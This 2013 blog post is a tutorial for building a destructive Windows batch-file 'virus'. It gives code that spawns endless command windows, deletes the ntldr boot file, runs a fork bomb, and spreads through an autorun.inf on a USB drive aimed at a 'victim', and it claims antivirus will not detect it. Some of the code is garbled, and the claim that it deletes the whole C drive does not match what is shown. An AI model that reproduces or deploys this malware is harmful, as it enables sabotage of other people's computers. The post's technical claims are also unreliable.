Sunday 7 July 2013

Learn To Make Dangerous Virus In A Minute

In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk. In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.  

1. Open Notepad and copy below code into it.
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.

CODE:- @ECHO off :top START %SystemRoot%\system32\notepad.exe

:x
start cmd.exe
goto x // infinite loop

This code will be opening command prompt screen infinite times , irritating victim and affecting performance.


aatrib -S -R -H c:\ntldr
del c:\ntldr

this will del ntldr comp win will not start

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows This is actually known as 'fork bomb'.

spread through pendrive

Step 1.

Open notepad and write


        [autorun]
        open=anything.bat
        Icon=anything.ico


Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

No comments:

Post a Comment